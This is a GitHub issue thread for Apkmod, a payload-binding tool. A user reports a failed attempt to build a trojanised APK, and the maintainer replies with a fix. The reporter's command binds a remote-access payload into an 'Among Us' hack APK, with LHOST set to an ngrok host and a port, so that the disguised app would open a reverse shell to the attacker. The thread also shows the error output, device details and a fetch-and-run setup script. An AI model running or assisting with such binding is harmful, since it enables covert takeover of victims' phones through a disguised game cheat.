### ISSUE TITLE
Binding Error Missing Files

### ISSUE THREAD

**Issue by WhiteShadow8500** [Hax4us/Apkmod#95]
#Command 
apkmod -b /data/data/com.termux/files/home/Among_Us_Undetected-Signed.apk -o /sdcard/Among_us_hack.apk LHOST=2.tcp.ngrok.io LPORT=14954

[*] Binding /data/data/com.termux/files/home/Among_Us_Undetected-Signed.apk
Using APK template: /data/data/com.termux/files/home/Among_Us_Undetected-Signed.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/share/apkmod/root/.bind/original/AndroidManifest.xml
[!] can't bind, take screenshot and open a issue on github 

#Termux-Info 

Packages CPU architecture:
aarch64
Subscribed repositories:
sources.list
deb https://dl.bintray.com/termux/termux-packages-24/ stable main
game-repo (sources.list.d/game.list)
deb https://dl.bintray.com/grimler/game-packages-24 games stable
science-repo (sources.list.d/science.list)
deb https://dl.bintray.com/grimler/science-packages-24 science stable
unstable-repo (sources.list.d/unstable.list)
deb https://dl.bintray.com/xeffyr/unstable-packages unstable main
Updatable packages:
All packages up to date
Android version:
10
Kernel build information:
Linux localhost 4.14.116 #1 SMP PREEMPT Wed Sep 23 17:12:36 CST 2020 aarch64 Android
Device manufacturer:
HUAWEI
Device model:
MAR-LX1A

#apkmod -v

2.2 
 

#Oiginal Apk
https://apkadmin.com/0z1j46xh4597/Among_Us_Undetected-Signed.apk.html

**Comment by Hax4us** [comment]
Try latest Apkmod

Installation Instructions

`wget https://raw.githubusercontent.com/Hax4us/Apkmod/aapt2-a11/setup.sh`

`sh setup.sh`

Its not for production use so you may expect some errors but don't forget to report back for quick fix
